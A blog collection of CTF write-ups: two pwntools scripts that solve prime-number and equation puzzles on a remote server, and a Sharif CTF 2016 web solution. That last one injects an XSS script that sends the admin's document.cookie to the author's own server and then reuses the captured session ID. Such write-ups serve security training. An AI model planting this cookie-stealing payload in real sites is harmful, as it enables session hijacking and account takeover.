Internetwache CTF 2016: It's Prime Time! (Code) Write-up

Description:

We all know that prime numbers are quite important in cryptography. Can you help me to find some?

Solution: 

	#!/usr/bin/python
	# Author: Kitwipat Towattana (@icheernoom)
	# Thank: https://gist.github.com/ldong/808d5403c5e3b19f2f05
	from pwn import *
	import re, sys
	def find(n):
	return find_next_prime(n+1)
	def find_next_prime(n):
	return find_prime_in_range(n, 2*n)
	def find_prime_in_range(a, b):
	for p in range(a, b):
	for i in range(2, p):
	if p % i == 0:
	break
	else:
	return p
	return None
	r = remote('188.166.133.53', 11059)
	while True:
	try:
	result = r.recvline()
	log.success(result)
	problem = r.recvline()
	log.info(problem)
	prime = int(re.findall("after (.+):", problem)[0])
	ans = find(prime)
	log.info("{0}".format(ans))
	r.send("{0}\r\n".format(ans))
	except IndexError:
	log.success("{0}".format(problem))
	sys.exit()
	'''
	root@kali:~/Desktop# python code60.py
	[+] Opening connection to 188.166.133.53 on port 11059: Done
	[+] Hi, you know that prime numbers are important, don't you? Help me calculating the next prime!
	[*] Level 1.: Find the next prime number after 5:
	[*] 7
	[+] Yay, that's right!
	[*] Level 2.: Find the next prime number after 18:
	[*] 19
	[+] Yay, that's right!
	[*] Level 3.: Find the next prime number after 4:
	[*] 5
	[+] Yay, that's right!
	...[snip]...
	[*] Level 98.: Find the next prime number after 793:
	[*] 797
	[+] Yay, that's right!
	[*] Level 99.: Find the next prime number after 125:
	[*] 127
	[+] Yay, that's right!
	[*] Level 100.: Find the next prime number after 429:
	[*] 431
	[+] Yay, that's right!
	[*] IW{Pr1m3s_4r3_!mp0rt4nt}
	[+] IW{Pr1m3s_4r3_!mp0rt4nt}
	[*] Closed connection to 188.166.133.53 port 11059
	'''

view raw code60.py hosted with ❤ by GitHub

Flag: IW{Pr1m3s_4r3_!mp0rt4nt}

Internetwache CTF 2016: A numbers game (Code) Write-up

Description:

People either love or hate math. Do you love it? Prove it! You just need to solve a bunch of equations without a mistake.

Solution: 

	#!/usr/bin/python
	# Author: Kitwipat Towattana (@icheernoom)
	from pwn import *
	import sys
	r = remote('188.166.133.53', 11027)
	while True:
	try:
	result = r.recvline()
	log.success(result)
	problem = r.recvline()
	question = problem.split(': ')[1]
	log.info(problem)
	x, cond, num1, eq, num2 = question.split(' ')
	if "+" in cond:
	ans = int(num2) - int(num1)
	log.info("x = {0}".format(ans))
	r.send("{0}\r\n".format(ans))
	elif "-" in cond:
	ans = int(num2) + int(num1)
	log.info("x = {0}".format(ans))
	r.send("{0}\r\n".format(ans))
	elif "*" in cond:
	ans = int(num2) / int(num1)
	log.info("x = {0}".format(ans))
	r.send("{0}\r\n".format(ans))
	elif "/" in cond:
	ans = int(num2) * int(num1)
	log.info("x = {0}".format(ans))
	r.send("{0}\r\n".format(ans))
	except IndexError:
	log.success("{0}".format(problem))
	sys.exit()
	'''
	root@kali:~/Desktop# python code50.py
	[+] Opening connection to 188.166.133.53 on port 11027: Done
	[+] Hi, I heard that you're good in math. Prove it!
	[*] Level 1.: x + 10 = 23
	[*] x = 13
	[+] Yay, that's right!
	[*] Level 2.: x + 24 = 63
	[*] x = 39
	...[snip]...
	[*] Level 98.: x + 1259 = 1878
	[*] x = 619
	[+] Yay, that's right!
	[*] Level 99.: x * 1945 = 643795
	[*] x = 331
	[+] Yay, that's right!
	[*] Level 100.: x * 639 = 341865
	[*] x = 535
	[+] Yay, that's right!
	[+] IW{M4TH_1S_34SY}
	[*] Closed connection to 188.166.133.53 port 11027
	'''

view raw code50.py hosted with ❤ by GitHub

Flag: IW{M4TH_1S_34SY}

Sharif CTF 2016: PhotoBlog (Web) Write-up

Description:

A friend of mine have stolen my cat's picture on his blog. I want to login as admin user on his blog. Do you have any idea? The Blog

Solution:

1. Access to the blog, Found input field (user, comment, captcha) and user, comment are vulnerable to Cross-site Scripting (XSS)

2. Description tell me "want to login as admin", I custom JavaScript to steal a admin's cookie and put to comment.

<script>new Image().src = 'http://www.my.site/icheernoom.php?cookies=' +  encodeURI(document.cookie);</script>

3. Wait a minute and give some cookie in my site's access log.

/icheernoom.php?cookies=PHPSESSID=515386866780b5f132fc96c02b3ddb82

4. "Login as admin", I guess the admin page is /admin.php found it and redirect to /login.php, Try to access with a admin's cookie

Flag: 1b7a60600d5731739c0e2115bd4ebf7c